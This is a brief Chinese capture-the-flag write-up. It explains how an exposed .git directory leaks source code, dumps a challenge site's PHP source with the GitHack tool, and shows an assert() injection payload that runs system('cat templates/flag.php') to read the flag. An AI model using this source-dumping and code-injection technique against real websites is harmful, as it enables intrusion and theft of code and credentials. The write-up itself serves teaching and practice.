Git信息泄露的危害很大,可直接从源码获取敏感配置信息(如:邮箱,数据库),也可以进一步审计代码,挖掘文件上传、SQL注射等安全漏洞。缺陷编号:wooyun-2015-0117332。
获取利用代码:https://github.com/lijiejie/GitHack
实例:一道web题,My PHP Website。页面就就三个,home,about,contact。F12看源码,提示有个flag页面,访问是空的。其中在about中显示了使用了git,于是看下能不能导出源码来分析。
使用 python GitHack.py IP/.git
可以看到index源码如下:
<?php
if (isset($_GET['page'])) {
$page = $_GET['page']; }
else {
$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!"); ?>
对file没有处理,直接构造payload
') or system('cat templates/flag.php');//
意思是先将strpos函数闭合,然后调用系统命令查看template目录下的flag.php,再把后面注释掉 。
访问后得到flag
网友评论